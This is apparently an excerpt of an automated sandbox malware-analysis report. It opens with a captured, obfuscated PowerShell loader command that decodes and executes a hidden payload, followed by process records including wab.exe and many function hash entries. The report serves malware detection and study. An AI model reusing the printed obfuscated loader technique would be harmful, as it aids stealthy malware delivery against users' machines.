StenvSi,dse InsnrkreretSkoss]Ninet:tale,:ArvelFWaughr Cravo Jen mOn chBSkralaRh.pis usikeDiol,6Phone4 Typ.SEksamtXyl,prZoneliPar enSe.ilgShant( Medu$SolvoNForedeAurigcSlit,tFo.vaaS attnTraildUnlovr EpidaDatab) Reko ');&($Batiste) (Cert69 'Lugma$ SampN FotooO igonTvet,p Co neVenesrSlamsvLnklaeSekserCist sPolytiEnfolv UltreEfter Indre=Marke B au[RdbysSMi.veyUnltrsSoaprtMasteeEl.omm Harp.FliseTSummeeBellyxRefo,tSc,em.Sep,eEM.veon Se icSetulo HeksdRedisiP.llinTjensg un e] Li,e: udhn: ApteAMom nSPokalCka.toISpindIFl.gt..ademGberhyeAdelhtEyehoS rabtCountrHuishiDetacnC,olegQueth(gesti$Vrdiso SamsmOxysakSorteaPenolrPassetOplsneSlv irCoenai BedenBelasg Multsbarne)P,cti ');&($Batiste) (Cert69 'Alcor$AmalgJForkaoHouopg OvergTrlleiAnme,nRo.kegUnivet naarjInfan=Anstt$Und,rNB.rnao Waganpa ajpVenskeImpotrChildv CoeleMonolrVinifs bliti,rawevDdelieArgen.B,lbosS,badu,alambLi.fas PolktInfierEpipai,ransnInforgRadbr( Sej.2Taman9Las,r6Sprre5 Cl,i3 Bamb1Nachs,Tyros2Lakmu5 Ga e8 Stje7 ider3 ord)O.fic ');&($Batiste) $Joggingtj;}
                                                        Imagebase:0xac0000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:08:08:26
                                                        Start date:18/03/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:17
                                                        Start time:08:08:58
                                                        Start date:18/03/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):
                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe
                                                        Imagebase:
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:
                                                        Has administrator privileges:
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF8489DA036 Relevance: .5, Instructions: 474COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0be0b13e20ea9bbfaf47440823d0354c1a5e3eb887b9423dcaa6946452d86921
                                                          • Instruction ID: 5d12e90f12c59709f3d6dc7d2468e918646c682ece3ea8e1586008f63fcea583
                                                          • Opcode Fuzzy Hash: 0be0b13e20ea9bbfaf47440823d0354c1a5e3eb887b9423dcaa6946452d86921
                                                          • Instruction Fuzzy Hash: 3BF1B53090CA4D8FEBA8EF28C8557E97BD1FF94351F04426ED84DC7292DB3898958B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF8489DB1F2 Relevance: .5, Instructions: 460COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 87aa9a4ba7c961a7a9b563537fd977b706267781c955b84f704b8fb8bf2cd1de
                                                          • Instruction ID: 020655f1e168fbe13a6e78f5cf643b87984fb86c6680ad193843dc2c81fe33d0
                                                          • Opcode Fuzzy Hash: 87aa9a4ba7c961a7a9b563537fd977b706267781c955b84f704b8fb8bf2cd1de
                                                          • Instruction Fuzzy Hash: 22E1B33090DE4D8FEBA8EF28C8597E97BD1EB54351F04426EE84DC7292DF7498448B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF8489D59CD Relevance: .5, Instructions: 507COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bdb97760481730e37ed73557e0cd8b5db0a495952bd4121f07fefaf6e21c795
                                                          • Instruction ID: 9049f9041da2203c07c867ddc0b42873bbf2b250c7223b9dce82a334d15e2647
                                                          • Opcode Fuzzy Hash: 8bdb97760481730e37ed73557e0cd8b5db0a495952bd4121f07fefaf6e21c795
                                                          • Instruction Fuzzy Hash: C1F1C230A1CA4D8FDF84EF58C499AA9BBF1FF68351F14416AD449D7296CB34E842CB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF8489D4695 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1b3f974219188d096602d10870634bb615a2fcd564d945681fdededa07f2ce7
                                                          • Instruction ID: 96ec44ebb534e4b3ba0a6278f5731842a977246c41c8c356c6e6703e7309a48b
                                                          • Opcode Fuzzy Hash: e1b3f974219188d096602d10870634bb615a2fcd564d945681fdededa07f2ce7
                                                          • Instruction Fuzzy Hash: 8E01A77010CB0C4FD744EF0CE051AA5B7E0FB85360F10052DE58AC3651D736E881CB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF8489D5AC3 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ffaa413c74d10499f2c3ace8111ea8eb431fdb9d6c51d4a7ba1fcf674ad02b99
                                                          • Instruction ID: 2ec7bbc612dc85f88fc2b51a0742879434f1965b5e7fc8efb88994d102776e66
                                                          • Opcode Fuzzy Hash: ffaa413c74d10499f2c3ace8111ea8eb431fdb9d6c51d4a7ba1fcf674ad02b99
                                                          • Instruction Fuzzy Hash: DDF0303275CA044FDB4CAA5CF8429B9B3D0E799335B10016FE48BC2656D926E4938686
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF8489D5B09 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2912239246.00007FF8489D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff8489d0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 591d5b0c674a883747212173ad9bd4fc8008b61f949f91539254442341d4874a
                                                          • Instruction ID: 67344cc4bee396dc1855f83d18778e90bf3ab63d1759f8082292946295268b7c
                                                          • Opcode Fuzzy Hash: 591d5b0c674a883747212173ad9bd4fc8008b61f949f91539254442341d4874a
                                                          • Instruction Fuzzy Hash: 5FF0373275CA044FDB4CAA1CF4429B573D0E795325B10017EF48BC2597D917E4428685
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          Function 02C8CC38 Relevance: .3, Instructions: 281COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e0392d0451d18a79336e0a412908f40a1e9a0780f1a7fe9ddb33e5c2e0322aa
                                                          • Instruction ID: 2f1b34dd2a7eb27300e7d194fdef3c5044a920a8152c5a59158125cab29c226e
                                                          • Opcode Fuzzy Hash: 3e0392d0451d18a79336e0a412908f40a1e9a0780f1a7fe9ddb33e5c2e0322aa
                                                          • Instruction Fuzzy Hash: 9EB14E71E002098FDB14EFA9C9857ADBBF2BF88318F14C12AD815E7254EB359A45CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8D508 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f6caad8173feda806a4b0669e2a0d592a1c011cb0401639163e1788fb2a03e5f
                                                          • Instruction ID: 193080e9a2b9f7200e663c366d64a1893ce556ef4ede588e376917bb47fd2b05
                                                          • Opcode Fuzzy Hash: f6caad8173feda806a4b0669e2a0d592a1c011cb0401639163e1788fb2a03e5f
                                                          • Instruction Fuzzy Hash: 8CB13EB0E002098FDF10DFB9D98579DBBF2AF88718F14C529D81AE7294EB749945CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0719A470 Relevance: 13.3, Strings: 10, Instructions: 784COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$845l$845l$845l$845l$845l$tPeq$tPeq$tPeq$tPeq
                                                          • API String ID: 0-539280492
                                                          • Opcode ID: b0e3bfcda09ce8def92557f5d79b3c3eed4a9b3b3799ec85161bd10b03466995
                                                          • Instruction ID: 124ad2212d55922a92e24858ad681f39cfad458406c8461173d99533a3475375
                                                          • Opcode Fuzzy Hash: b0e3bfcda09ce8def92557f5d79b3c3eed4a9b3b3799ec85161bd10b03466995
                                                          • Instruction Fuzzy Hash: 7352D6B1B002059FCF169F68C851A6ABBE2FF85310F15C46AE9059B3D1DB31DD46CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C89548 Relevance: 4.3, Strings: 3, Instructions: 521COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hiq$$eq$$eq
                                                          • API String ID: 0-2852621797
                                                          • Opcode ID: ccb6c374e3044ea828f03afa0da87ae403ab7e1fb393f1bc12cb683be56eaf4d
                                                          • Instruction ID: 7aad0b509b1b0620a74269c9f642318abbeee7c9ff2fe2b5de627d9873268ffb
                                                          • Opcode Fuzzy Hash: ccb6c374e3044ea828f03afa0da87ae403ab7e1fb393f1bc12cb683be56eaf4d
                                                          • Instruction Fuzzy Hash: 75224E34B012148FCB25EB25C8547AEBBB2BF89704F1584E9D40AAB391DF359E85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0719A454 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2802247987.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7190000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 845l$tPeq
                                                          • API String ID: 0-1948393664
                                                          • Opcode ID: 9dd244212a79e1d6d4f3fc3fbbbbb0779850198a1a43b7e749b71ba2d2642991
                                                          • Instruction ID: 138ea8b4d6a6aad076580e169f20d398d8dc5cf4e0e4f18e257ab07e74dbe3c3
                                                          • Opcode Fuzzy Hash: 9dd244212a79e1d6d4f3fc3fbbbbb0779850198a1a43b7e749b71ba2d2642991
                                                          • Instruction Fuzzy Hash: A0518FB1A00205DFCF268F58C444A6ABBF2BF49310F59C4A5E8559B2D1D731ED4ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C842E8 Relevance: .7, Instructions: 723COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b697f2ef38ead5215e17f26f2ed179e472d699042031d1d45072ad8034b55900
                                                          • Instruction ID: 9f0dfa147d00b6f99d024a1b03987207161fd20b1a692cc46d50fd69069dc11b
                                                          • Opcode Fuzzy Hash: b697f2ef38ead5215e17f26f2ed179e472d699042031d1d45072ad8034b55900
                                                          • Instruction Fuzzy Hash: 55527B74A05259DFCB15DFA8D484A9DBBB2FF89314F24C199E805AB362C731ED81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8E2A0 Relevance: .6, Instructions: 576COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: beb9f31373731455fc0f231eecd594e4c9c942bd5b50ab01323ad2c24e2b2f21
                                                          • Instruction ID: efca4a26d05ff412e438b93ececc67ef8490d53da27312138e8eebb7cc3a18b7
                                                          • Opcode Fuzzy Hash: beb9f31373731455fc0f231eecd594e4c9c942bd5b50ab01323ad2c24e2b2f21
                                                          • Instruction Fuzzy Hash: 6F324974A002189FCB15DFA9D484AADBBF2FF89314F24C4A9E405AB362D735ED41CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C837B0 Relevance: .5, Instructions: 468COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b805d6654b2878400497acb69f45151cca5cc9977f8d41da469d085fafdc71f6
                                                          • Instruction ID: d0ef7184843fba7085852d62e9b0a49bef29fa722ed0b8faa5fcbf277d5dd4f0
                                                          • Opcode Fuzzy Hash: b805d6654b2878400497acb69f45151cca5cc9977f8d41da469d085fafdc71f6
                                                          • Instruction Fuzzy Hash: B6122A74A002499FCB15DF99C484AAEFBB2FF88714F24D199E845AB365C731ED81CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8CC2C Relevance: .3, Instructions: 277COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3f7a89cf67d038ac0652864ea5b85ff51e17500f05af867d93d65accd687ca21
                                                          • Instruction ID: 3d1b6741ca9fd1e5058e1f40816a939bbfdac1eb72feebbcdda1c7ff33ef4d11
                                                          • Opcode Fuzzy Hash: 3f7a89cf67d038ac0652864ea5b85ff51e17500f05af867d93d65accd687ca21
                                                          • Instruction Fuzzy Hash: 4FB15EB1E002098FDB14EFA9C98579DBBF1BF88318F14C12AD814E7254EB359A45CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8D4FE Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88dad549da795e63d317d6bf690f7f5f9b2d10f0aa831bb13d47dcdd9e5b8a48
                                                          • Instruction ID: f71e63f1553892e89c3420000f5f7e1c5d8526d1c2e60f409a51120724dff4c5
                                                          • Opcode Fuzzy Hash: 88dad549da795e63d317d6bf690f7f5f9b2d10f0aa831bb13d47dcdd9e5b8a48
                                                          • Instruction Fuzzy Hash: 45A16CB0E002098FDB10DFB8D98579DBBF1AF88718F14C529E81AE7294EB749945CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C83C28 Relevance: .1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6304333486617fa5d45cd6c5cbf51f02549e8fd14515a60c49ea44f6e250b51
                                                          • Instruction ID: ab869ec445582c11d0f33c6094fe84a9ac7db8797a6da6cc9526f8ded5cb7967
                                                          • Opcode Fuzzy Hash: b6304333486617fa5d45cd6c5cbf51f02549e8fd14515a60c49ea44f6e250b51
                                                          • Instruction Fuzzy Hash: 1F519C74A00545DFCB05CF99C494AAEFBB1FF88314B24929AD515AB3A0C732ED91CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8339C Relevance: .1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b763a6c9c52b9fdf3fc76adf880a90368c04a23a0f366f2c38b05e5e82fd2450
                                                          • Instruction ID: 3a0458bb1a9b5b579db31d263e309f53b49fc101be7ff754fe0ee474db82abef
                                                          • Opcode Fuzzy Hash: b763a6c9c52b9fdf3fc76adf880a90368c04a23a0f366f2c38b05e5e82fd2450
                                                          • Instruction Fuzzy Hash: E341F59690E7E11FE703A738A8701D67F70EF57228F4A40D7C5D88B1A7D628590DC3AA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8492F Relevance: .1, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bcb61d96fe0e3797258f95020991c5fb9f57b541343bade3b5b2257418c2b59b
                                                          • Instruction ID: 7b47b3a63f0f73ea6fb0b22f2daae719cbd93a0e4bc436eba6ba763fa2e0b5e1
                                                          • Opcode Fuzzy Hash: bcb61d96fe0e3797258f95020991c5fb9f57b541343bade3b5b2257418c2b59b
                                                          • Instruction Fuzzy Hash: 5951E674A00209EFDB15DFA8D584A9DBBB2FF88314F28C559E405AB365C771ED82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C85175 Relevance: .1, Instructions: 113COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a18de381eb367fb44384be1b0be58b165923340b672fedfbae913fed4656ddf0
                                                          • Instruction ID: 413ffdaf14b99b67dbded1c5bfa534e3917d7488eda99239d670caa72963edd1
                                                          • Opcode Fuzzy Hash: a18de381eb367fb44384be1b0be58b165923340b672fedfbae913fed4656ddf0
                                                          • Instruction Fuzzy Hash: 48510574A00208EFCB05DB98D584AADFBF2FF88314F65C159E405AB365CB75AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C839C1 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abf8f566076be691e38b9c3dde5a31fc79539d80b1df39d77aeef08eced14d23
                                                          • Instruction ID: 63773e45fa14d7e7748191e30461033bd5ab1290eace870dcd2475b5af25290f
                                                          • Opcode Fuzzy Hash: abf8f566076be691e38b9c3dde5a31fc79539d80b1df39d77aeef08eced14d23
                                                          • Instruction Fuzzy Hash: AB41F774A00208EFDB05DF98D584A9DFBB2FF88314F24D199E805AB365C771AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C832C1 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b826e750f5e2aa3feba64f3da3ac86bf868aca46518019c7802ff8fc49bbc645
                                                          • Instruction ID: ced73bb64350a10f48e1119156b625231562547c17f2af44f868bbd7d0243dcd
                                                          • Opcode Fuzzy Hash: b826e750f5e2aa3feba64f3da3ac86bf868aca46518019c7802ff8fc49bbc645
                                                          • Instruction Fuzzy Hash: 13313674A006499FCB00DF8DD8809AEBBB5FF89314B6485A5E809EB356C731ED51CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C8A200 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8827df8a1ba7169ab8cbd2565eb14bb4b718c490b2ef75d7f48379ef56a1076a
                                                          • Instruction ID: 5a2a51f8522f6ec4aa1c8550477b2efff3562e157f786d614eecb5e0d97ad1bb
                                                          • Opcode Fuzzy Hash: 8827df8a1ba7169ab8cbd2565eb14bb4b718c490b2ef75d7f48379ef56a1076a
                                                          • Instruction Fuzzy Hash: FA31FC30A011188FCB25EB64C8546EEB7B2BF89308F1584E9D50AAB351DB359E85CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C832D8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1e22f180ce486420028b3366c63aa20d951f848fe5f5210cbacf775a6facd77
                                                          • Instruction ID: e98b6d4c66a8575c3f56d9ecadc513293fb01153c97c59f6a1d651c35b253e51
                                                          • Opcode Fuzzy Hash: b1e22f180ce486420028b3366c63aa20d951f848fe5f5210cbacf775a6facd77
                                                          • Instruction Fuzzy Hash: C0211674A00509DFCB04DF89C8849AEFBB1FF88314B248599E809AB751C731ED51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C84A98 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b268af126bba6d28a266faf8a6fbf1da579c4d6bf82a5803e5654a04a41e48e8
                                                          • Instruction ID: b48e9708134157a2c8eafbc6115013896282e153efc8ac34b1b087b413b31989
                                                          • Opcode Fuzzy Hash: b268af126bba6d28a266faf8a6fbf1da579c4d6bf82a5803e5654a04a41e48e8
                                                          • Instruction Fuzzy Hash: A821D5B8A0051A9FCB54DF89C580AAAF7B5FB4C314B148559E909E7351C731ED91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C84A3C Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f07631198392588ef6e8cb61b19acbc38ec8929043907be9377e77caa62001a4
                                                          • Instruction ID: 1ec766a67a238990cf0e593f5582da15f54a581d3a6c44c3efcc338204fa8e24
                                                          • Opcode Fuzzy Hash: f07631198392588ef6e8cb61b19acbc38ec8929043907be9377e77caa62001a4
                                                          • Instruction Fuzzy Hash: 7211D774A01209EFDB15DFA8D484A9DBBB2FF88314F28C559E405AB365C771A982DB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02C85273 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2767910467.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_2c80000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b10b8946587d00dc03841265b4f8f840e148beafd73b982d0c33c3a5b46e5b26
                                                          • Instruction ID: 3b2c4d5dc894ad1d05e32f9d5958c7e194301acc0e0882525709e752bb220aea
                                                          • Opcode Fuzzy Hash: b10b8946587d00dc03841265b4f8f840e148beafd73b982d0c33c3a5b46e5b26
                                                          • Instruction Fuzzy Hash: B411FB74A04209EFDB45DF98D484A9DBBF1FF48314F69C154E405AB361CB71AD82CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

